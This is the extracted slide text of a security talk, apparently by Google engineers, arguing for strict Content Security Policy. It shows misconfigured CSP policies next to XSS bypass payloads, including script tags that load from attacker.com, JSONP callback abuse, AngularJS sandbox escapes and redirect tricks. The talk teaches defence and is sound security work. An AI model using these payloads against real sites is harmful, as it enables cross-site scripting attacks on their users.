csp is dead long live strict csp
play

CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum About Us - PowerPoint PPT Presentation

Apr 09, 2023 •178 likes •553 views

CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum About Us Lukas Weichselbaum Michele Spagnuolo Senior Information Security Senior Information Security Engineer Engineer We work in a special focus area of the Google security team aimed

  1. CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum

  2. About Us Lukas Weichselbaum Michele Spagnuolo Senior Information Security Senior Information Security Engineer Engineer We work in a special focus area of the Google security team aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs.

  3. WHAT IS CSP ? A tool developers can use to lock down their web applications in various ways. CSP is a defense-in-depth mechanism - it reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.

  4. CSP 2 specification: https://www.w3.org/TR/CSP/ GOALS OF CSP CSP 3 draft: https://w3c.github.io/webappsec-csp/ Have been pretty ambitious... Granular control over Sandbox not just iframes, but Find out when your application resources that can be executed any resource, framed or not. gets exploited , or behaves e.g. execution of inline scripts , The content is forced into a differently from how you think dynamic code execution (eval), unique origin, preventing it it should behave. By collecting trust propagation . from running scripts or plugins, violation reports, an submitting forms, etc... administrator can be alerted and easily spot the bug. MITIGATE XSS REDUCE PRIVILEGE DETECT EXPLOITATION risk of the application by monitoring violations 4

  5. WHAT’S IN A POLICY? It’s a HTTP header. CSP directives Actually, two. Most of them useless for XSS mitigation. base-uri enforcing mode default-src Content-Security-Policy: connect-src report-only mode img-src Content-Security-Policy-Report-Only: font-src child-src script-src frame-ancestors media-src object-src style-src plugin-types report-uri We’ll focus on script-src . 5

  6. HOW DOES IT WORK? A policy in detail Content-Security-Policy CSP money.example.com money.example.com allows default-src 'self'; script-src 'self' yep.com; <img src="cat.png"> yep.com CSP report-uri /csp_violation_logger; allows <script src="//yep.com/x.js"> 6

  7. HOW DOES IT WORK? Script injections (XSS) get blocked Content-Security-Policy CSP money.example.com money.example.com allows default-src 'self'; script-src 'self' yep.com; <img src="cat.png"> yep.com CSP report-uri /csp_violation_logger; allows <script attacker.com src="//yep.com/x.js"> CSP ">'><script blocks src="//attacker.com"> source not whitelisted CSP ">'><script>alert(42) blocks </script> DEMO inline script not allowed money.example.com/csp_violations_logger 7

  8. BUT... IT'S HARD TO DEPLOY Two examples from Twitter and GMail 8

  9. BUT... IT'S HARD TO DEPLOY Two examples from Twitter and GMail Policies get less secure the longer they get. These are not strict... they allow 'unsafe-inline' (and 'unsafe-eval'). Even if they removed 'unsafe-inline' (or added a nonce), any JSONP endpoint on whitelisted domains/paths can be the nail in their coffin. In practice, in a lot of real-world complex applications CSP is just used for monitoring purposes , not as a defense-in-depth against XSS. 9

  10. eaking ad

  11. COMMON MISTAKES [1/4] Trivial mistakes 'unsafe-inline' in script-src (and no nonce) Same for default-src , if script-src 'self' 'unsafe-inline'; there's no script-src object-src 'none'; directive. Bypass ">'>< script >alert(1337)</ script > 11

  12. COMMON MISTAKES [2/4] Trivial mistakes URL schemes or wildcard in script-src (and no 'strict-dynamic') Same for URL schemes and script-src 'self' https: data: *; wildcards in object-src . object-src 'none'; Bypasses ">'><script src= https ://attacker.com/evil.js></script> ">'><script src= data :text/javascript,alert(1337)></script> 12

  13. COMMON MISTAKES [3/4] Less trivial mistakes Missing object-src or default-src directive script-src 'self'; It looks secure, right? Bypass ">'>< object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/ch arts/assets/charts.swf?allowedDomain=\"})))}catch(e){ alert(1337) }//'> <param name="AllowScriptAccess" value="always"></ object > 13

  14. COMMON MISTAKES [4/4] Less trivial mistakes Allow 'self' + hosting user-provided content on the same origin script-src 'self'; Same for object-src . object-src 'none'; Bypass ">'><script src=" /user_upload/evil_cat.jpg.js "></script> 14

  15. BYPASSING CSP [1/5] Whitelist bypasses JSONP-like endpoint in whitelist script-src 'self' https://whitelisted.com; object-src 'none'; Bypass ">'><script src="https://whitelisted.com/jsonp?callback= alert "> DEMO 15

  16. BYPASSING CSP [2/5] JSONP is a problem bypassable.com alert(1);u({...}) CSP ">'><script allows src="https://whitelisted.com/j sonp?callback= alert(1);u "> A SOME * attack x.click({...}) CSP ">'><script allows src="https://whitelisted.com/j sonp?callback= x.click "> * Same Origin Method Execution 1) You whitelist an origin/path hosting a JSONP endpoint. 2) Javascript execution is allowed, extent is depending on how Don't whitelist JSONP endpoints. liberal the JSONP endpoint is and what a user can control Sadly, there are a lot of those out there. (just the callback function or also parameters). ...especially on CDNs! 16

  17. BYPASSING CSP [3/5] Whitelist bypasses AngularJS library in whitelist script-src 'self' https://whitelisted.com; object-src 'none'; Bypass "><script src=" https://whitelisted.com /angular.min.js"></script> <div ng-app ng-csp> {{1336 + 1}} </div> Also works without user "><script interaction, e.g. by combining src=" https://whitelisted.com /angularjs/1.1.3/angular.min.js"> with JSONP endpoints or other </script> JS libraries. <div ng-app ng-csp id=p ng-click=$event.view. alert (1337)> 17

  18. BYPASSING CSP [4/5] AngularJS is a problem bypassable.com Sandbox bypass in CSP AngularJS ng-app ng-csp ng-click=$event.view. alert(1337) > allows <script src=" //whitelisted.com/angular.js "></script> Outdated Angular ng-app ng-csp> CSP + outdated <script src="//whitelisted.com/angular.js"></script> allows Prototype.js giving <script src="//whitelisted.com/prototype.js"> access to window </script>{{$on.curry.call(). alert(1) }} Powerful JS frameworks are a problem 1) You whitelist an origin/path hosting a version of AngularJS with known sandbox bypasses. Or you combine it with outdated Prototype.js. Or JSONP endpoints. 2) The attacker can exploit those to achieve full XSS. Don't use CSP in combination with CDNs hosting AngularJS. For more bypasses in popular CDNs, see Cure53's mini-challenge. 18

  19. BYPASSING CSP [5/5] Path relaxation Path relaxation due to open redirect in whitelist script-src https://whitelisted.com/totally/secure.js https://site.with.redirect.com; object-src 'none'; Bypass Path is ignored ">'><script src="https://whitelisted.com/jsonp?callback= alert "> after redirect! ">'><script src="https://site.with.redirect.com/redirect?url=https%3A//whitelisted.com/ jsonp %2Fcallback%3D alert "> Spec: "To avoid leaking path information cross-origin (as discussed in Homakov’s Using Content-Security-Policy for Evil), the matching algorithm ignores path component of a source expression if the resource loaded is the result of a redirect." money.example.com <script CSP CSP site.with.redirect.com whitelisted.com src="https://site.with.redirect.com/ allows allows redirect?url=https%3A//whitelisted.com /jsonp%2Fcallback%3Dalert"></script> Path is ignored 19 after redirect!

  20. CSP EVALUATOR "A Tool to Rule Them All" https://csp-evaluator.withgoogle.com Core library is open source ● Also as a Chrome Extension ● 20

  21. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web CSP is Dead, Long Live CSP On the Insecurity of Whitelists and the Future of Content Security Policy Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, Artur Janc ACM CCS, 2016, Vienna https://goo.gl/VRuuFN 21

  22. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web CSP CSP 1.6 Million Google Index WWW 26,011 Hosts with 100 Billion pages unique CSPs CSP Filter Dedupe JSONP 8.8 Million JSONP Filter endpoints In addition to the CSPs, we also collected JSONP endpoints and Angular Angular libraries (whitelist bypasses) 2.6 Million Angular Filter libraries 22

  23. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web Bypassable Unsafe Wildcard in Trivially Unique CSPs Report Only Missing domain unsafe_inline script-src Bypassable object_src in script-src whitelist Total whitelist 2591 21947 3131 5753 19719 24637 Unique CSPs 26011 9.96% 84.38% 12.04% 22.12% 75.81% 94.72% 0 19652 2109 4816 17754 21232 XSS Policies 22425 0% 87.63% 9.4% 21.48% 79.17% 94.68% 0 0 348 0 1015 1244 Strict XSS Policies 2437 0% 0% 14.28% 0% 41.65% 51.05% 23

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

THE BROWSER IS DEAD Dan North Dan North &amp; Associates LONG LIVE THE BROWSER! Dan North

THE BROWSER IS DEAD Dan North Dan North &amp; Associates LONG LIVE THE BROWSER! Dan North

THE BROWSER IS DEAD Dan North Dan North &amp; Associates LONG LIVE THE BROWSER! Dan North Dan North &amp; Associates The gangs 1990: Tim Berners-Lee - (WorldWideWeb) 1993: NCSA Mosaic 1994: Netscape - Navigator 1995: Microsoft -

971 views • 21 slides
ETL is dead; long-live streams Neha Narkhede, Co-founder &amp; CTO, Confluent Data and

ETL is dead; long-live streams Neha Narkhede, Co-founder &amp; CTO, Confluent Data and

ETL is dead; long-live streams Neha Narkhede, Co-founder &amp; CTO, Confluent Data and data systems have really changed in the past decade Old world: Two popular locations for data DB DB DWH DB DB Operational databases Relational

1.22k views • 103 slides
Openmoko is dead. Long live OpenPhoenux! Nikolaus Schaller, Lukas Mrdian LinuxTag, Berlin, May

Openmoko is dead. Long live OpenPhoenux! Nikolaus Schaller, Lukas Mrdian LinuxTag, Berlin, May

Openmoko is dead. Long live OpenPhoenux! Nikolaus Schaller, Lukas Mrdian LinuxTag, Berlin, May 26 th , 2012 Agenda Part one: some history Part two: a long way home Part three: rising from the ashes Part four: flying higher Part five: use

563 views • 42 slides
OOP is dead, long live Data-oriented design Stoyan Nikolov @stoyannk CppCon 2018 | @stoyannk

OOP is dead, long live Data-oriented design Stoyan Nikolov @stoyannk CppCon 2018 | @stoyannk

OOP is dead, long live Data-oriented design Stoyan Nikolov @stoyannk CppCon 2018 | @stoyannk Who am I? In the video games industry for 10+ years Software Architect at Coherent Labs Working on game development technology

783 views • 46 slides
HMM: GUP NO MORE ! XDC 2018 Jrme Glisse HETEROGENEOUS COMPUTING CPU is dead, long live the

HMM: GUP NO MORE ! XDC 2018 Jrme Glisse HETEROGENEOUS COMPUTING CPU is dead, long live the

HMM: GUP NO MORE ! XDC 2018 Jrme Glisse HETEROGENEOUS COMPUTING CPU is dead, long live the CPU Heterogeneous computing is back, one device for each workload: GPUs for massively parallel workload Accelerators for specifjc workload

272 views • 26 slides
Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead!

Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead!

Look, no Mocks! Functional TDD with F# Mark Seemann http://blog.ploeh.dk @ploeh TDD is dead! http://david.heinemeierhansson.com/2014/tdd-is-dead-long-live-testing.html Is TDD dead? A system you cant test Detestable

656 views • 63 slides
Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD

Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD

Dead Code Elimination (DCE) Dead code elimination is an optimization that removes DEAD variables A variable that is defined and not LIVE OUT is DEAD do { computeLiveness() foreach instruction I { if (defs.contains(I) &amp;&amp;

599 views • 12 slides
Proposed Mayor and Council Response to County Grand Jury Report: Redevelopment Is Dead! Long Live

Proposed Mayor and Council Response to County Grand Jury Report: Redevelopment Is Dead! Long Live

Office of the Independent Budget Analyst Proposed Mayor and Council Response to County Grand Jury Report: Redevelopment Is Dead! Long Live Redevelopment! Presentation for City Council September 9, 2013 Item - S401 Overview The Grand Jury

215 views • 20 slides
Approximate Computing Is Dead; Long Live Approximate Computing Adrian Sampson Cornell Hardware

Approximate Computing Is Dead; Long Live Approximate Computing Adrian Sampson Cornell Hardware

Approximate Computing Is Dead; Long Live Approximate Computing Adrian Sampson Cornell Hardware Programming Quality Domains Hardware Programming No more approximate functional units. Quality Domains Narrower bit widths are just as

783 views • 33 slides
400 . 20 . , - , , - , . , , .

400 . 20 . , - , , - , . , , .

400 . 20 . , - , , - , . , , . The Royal Hotel Spa, Resort&amp;Convention Venter 5*Dlx Isrotel Dead Sea 5* The Daniel Dead Sea 5* Le Meridien Dead Sea 5* Crowne Plaza Dead

188 views • 17 slides
Long live robustness! Michael L. Seltzer Microsoft Research REVERB 2014 | May 10, 2014

Long live robustness! Michael L. Seltzer Microsoft Research REVERB 2014 | May 10, 2014

Robustness is dead! Long live robustness! Michael L. Seltzer Microsoft Research REVERB 2014 | May 10, 2014 Collaborators: Dong Yu, Yan Huang, Frank Seide, Jinyu Li, Jui-Ting Huang Golden age of speech recognition More investment, more

748 views • 39 slides
My microbes and me: A live-long relationship 1. The first come to us latest at birth (Caesarean

My microbes and me: A live-long relationship 1. The first come to us latest at birth (Caesarean

My gut microbes and me : Exploring this live-long and fragile relationship Peer Bork Structural and Computational Biology EMBL, Heidelberg Aiming at a functional understanding of biological systems My microbes and me: A live-long relationship

685 views • 51 slides
USB dead drop July 2015 What is it USB device installed in a public space name

USB dead drop July 2015 What is it USB device installed in a public space name

USB dead drop July 2015 What is it USB device installed in a public space name (dead drop) comes from method of espionage communication not requiring to meet directly (contrast with live drop) anonymous, offline,

330 views • 12 slides
Simple for Dead load and Continuous for Live loads (SDCL)- Steel Bridges ABC Application Summary

Simple for Dead load and Continuous for Live loads (SDCL)- Steel Bridges ABC Application Summary

Simple for Dead load and Continuous for Live loads (SDCL)- Steel Bridges ABC Application Summary of more than ten years of research, field application and monitoring Aaron Yakel- University of Nebraska-Lincoln Reza Farimani, Thornton Tomasetti

1.11k views • 61 slides
The Monad of Strict Computation A Categorical Framework for the Semantics of Languages in which

The Monad of Strict Computation A Categorical Framework for the Semantics of Languages in which

The Monad of Strict Computation A Categorical Framework for the Semantics of Languages in which Strict and Non-strict computation rules are mixed Dick Kieburtz Portland State University WG2.8 Meeting July 16-20, 2007 The Problem, illustrated

507 views • 16 slides
2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this?

2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this?

2018/10/24 1 2018/10/24 2 SAFE DEAD WORK SAFE DEAD WORK.. What is this? There are two practical options.. NRS 097-2-1 compliance (switch off and break before you make) What is the Dead Grid Safety Lock?

907 views • 27 slides
Indigenous Institutions and Capacity in Tanzania Evans Osabuohien, Uchenna Efobi, Ciliaka Gitau,

Indigenous Institutions and Capacity in Tanzania Evans Osabuohien, Uchenna Efobi, Ciliaka Gitau,

www.covenantuniversity.edu.ng Raising a new Generation of Leaders Youth Employment and Large-scale Agricultural Land Investments: Examining the Relevance of Indigenous Institutions and Capacity in Tanzania Evans Osabuohien, Uchenna Efobi,

225 views • 20 slides
The 3-wave PDEs for resonantly interac7ng triads Ruth Mar7n &amp; Harvey Segur Waves and

The 3-wave PDEs for resonantly interac7ng triads Ruth Mar7n &amp; Harvey Segur Waves and

The 3-wave PDEs for resonantly interac7ng triads Ruth Mar7n &amp; Harvey Segur Waves and singulari7es in incompressible fluids ICERM, April 28, 2017 What are the 3-wave equa.ons? What is a resonant triad? ! Let denote the elevation of the

313 views • 28 slides
pkgsrc meets pkg-ng Generating pkg-ng packages from pkgsrc pkgsrcCon Berlin, July 4 th 2015

pkgsrc meets pkg-ng Generating pkg-ng packages from pkgsrc pkgsrcCon Berlin, July 4 th 2015

pkgsrc meets pkg-ng Generating pkg-ng packages from pkgsrc pkgsrcCon Berlin, July 4 th 2015 Pierre Pronchery &lt;khorben@defora.org&gt; Why pkg-ng Why not? Binary packages first-class citizens No more options for packages

449 views • 8 slides
Ge#ng Started with Con1nuous Integra1on Beth Tucker Long

Ge#ng Started with Con1nuous Integra1on Beth Tucker Long

Ge#ng Started with Con1nuous Integra1on Beth Tucker Long @e3betht Who am I? Beth Tucker Long (@e3betht) PHP Developer at Code Climate

678 views • 64 slides
a Very Short Introduction to AngularJS Lecture 11 CGS 3066 Fall 2016 November 8, 2016

a Very Short Introduction to AngularJS Lecture 11 CGS 3066 Fall 2016 November 8, 2016

a Very Short Introduction to AngularJS Lecture 11 CGS 3066 Fall 2016 November 8, 2016 Frameworks Advanced JavaScript programming (especially the complex handling of browser differences), can often be very difficult and time-consuming to

280 views • 11 slides
Professional Software Development 040coders.nl 2018-10-18 Klaas van Gend Klaas van Gend C++

Professional Software Development 040coders.nl 2018-10-18 Klaas van Gend Klaas van Gend C++

Professional Software Development 040coders.nl 2018-10-18 Klaas van Gend Klaas van Gend C++ Insert PSM here The Effect The Joel Test 12 Steps to Better Code Blogpost August 9, 2000

336 views • 31 slides
Neural Networks II Chen Gao Virginia Tech Spring 2019 ECE-5424G / CS-5824 Neural Networks

Neural Networks II Chen Gao Virginia Tech Spring 2019 ECE-5424G / CS-5824 Neural Networks

Neural Networks II Chen Gao Virginia Tech Spring 2019 ECE-5424G / CS-5824 Neural Networks Origins: Algorithms that try to mimic the brain. What is this? A single neuron in the brain Input Output Slide credit: Andrew Ng An artificial

321 views • 28 slides
Ordinarization Transform of a Numerical Semigroup Maria Bras-Amor os Universitat Rovira i

Ordinarization Transform of a Numerical Semigroup Maria Bras-Amor os Universitat Rovira i

Ordinarization Transform of a Numerical Semigroup Ordinarization Transform of a Numerical Semigroup Maria Bras-Amor os Universitat Rovira i Virgili International Meeting on Numerical Semigroups Cortona, September 2014 Ordinarization

462 views • 34 slides

More recommend